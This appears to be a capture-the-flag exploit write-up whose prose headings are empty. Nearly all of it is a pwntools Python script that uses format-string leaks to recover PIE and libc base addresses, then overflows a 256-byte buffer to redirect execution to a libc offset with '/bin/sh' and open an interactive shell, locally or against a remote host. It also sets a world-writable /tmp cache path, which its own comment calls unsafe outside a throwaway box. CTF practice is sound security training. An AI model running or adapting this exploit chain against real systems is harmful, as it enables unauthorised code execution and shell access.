Purpose : Get The Flag
Mitigations :
Crash :
Decompile :
#!/usr/bin/python3
from pwn import *
import struct
# To have GDB open in a tmux split instead of a new window, set:
#   context.terminal = ['tmux', 'splitw', '-h']
#
# pwntools' cache directory honours XDG_CACHE_HOME. Pointing it at the
# shared, world-writable /tmp/ means other local users could pre-create or
# tamper with that directory -- acceptable on a throwaway CTF box, worth a
# per-user path anywhere else.
os.environ['XDG_CACHE_HOME'] = '/tmp/'
# Silence pwntools' own logging so only this script's prints are shown.
context.log_level = 'error'


# Short-hand helpers. ``io`` is resolved at call time, so they work once the
# tube has been created further down. NOTE: the visible part of the script
# calls io.sendlineafter()/io.sendafter() directly instead of these.
def info(msg):
    """Forward *msg* to pwntools' logger at INFO level."""
    return log.info(msg)


def sla(msg, data):
    """Wait until *msg* arrives on ``io``, then send *data* plus a newline."""
    return io.sendlineafter(msg, data)


def sa(msg, data):
    """Wait until *msg* arrives on ``io``, then send *data* as-is."""
    return io.sendafter(msg, data)


def sl(data):
    """Send *data* plus a newline on ``io``."""
    return io.sendline(data)


def s(data):
    """Send *data* on ``io`` without a trailing newline."""
    return io.send(data)
# Allows you to switch between local/GDB/remote from terminal
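def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    The backend is chosen from pwntools' command-line ``args``:
    ``GDB`` runs the binary under gdb with the module-level ``gdbscript``,
    ``REMOTE`` connects to ``sys.argv[1]``/``sys.argv[2]`` (host, port),
    otherwise the binary at ``exe`` is started as a local process.

    Args:
        argv: extra command-line arguments appended after ``exe``. ``None``
            (the default) means none; a fresh list is built on every call,
            so no mutable default is shared between calls.
        *a, **kw: passed straight through to ``gdb.debug``/``remote``/
            ``process``.

    Returns:
        The tube object created by the selected backend.
    """
    extra = list(argv) if argv else []
    if args.GDB:  # breakpoints etc. come from ``gdbscript`` below
        return gdb.debug([exe] + extra, *a, gdbscript=gdbscript, **kw)
    if args.REMOTE:  # usage: script.py REMOTE <server> <port>
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + extra, *a, **kw)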
# Specify GDB script here (breakpoints etc)
gdbscript = '''
break *main+247
continue
continue
continue
continue
'''.format(**locals())
exe = './bin'; elf = context.binary = ELF(exe);exe_rop = ROP(elf,checksec=False)
libc = elf.libc ; libc_rop = ROP(libc)
io = start()
payload =b""
payload +=b"%13$p"
payload +=b"A"*(256-len(payload))
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"2")
leak=u64(io.recvuntil(b"1.").split(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")[1].split(b"\n")[0]+b"\x00"*2)
print(f"pie Leak :: {hex(leak)}")
elf.address = leak - 5073
print(f"pie base :: {hex(elf.address)}")
payload =b""
payload +=b"%3$p" ## speciall thanks to Hassan aka @72goul for turning this into format string to get libc leak from stack
payload +=b"A"*(256-len(payload))
payload +=p64(elf.address+0x1100)
#payload = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac"
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"0")
io.recvuntil(b"Invalid!\n")
leak_libc = int(io.recvline().split(b"AAAAAA")[0],16)
print(f"Libc leak :: {hex(leak_libc)}")
libc = elf.libc ; libc_rop = ROP(libc)
libc.address = leak_libc -1132679
print(f"Libc address :: {hex(libc.address)}")
payload =b""
payload +=b"/bin/sh\x00"
payload +=b"A"*(256-len(payload))
payload +=p64(libc.address+330323)
#payload = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac"
io.sendlineafter(b"Choice: ",b"3")
io.sendlineafter(b"nter new content length:",b"512")
io.sendlineafter(b"Enter new content:",payload)
io.sendafter(b"Choice: ",b"0")
io.recvuntil(b"Invalid!\n")
io.interactive()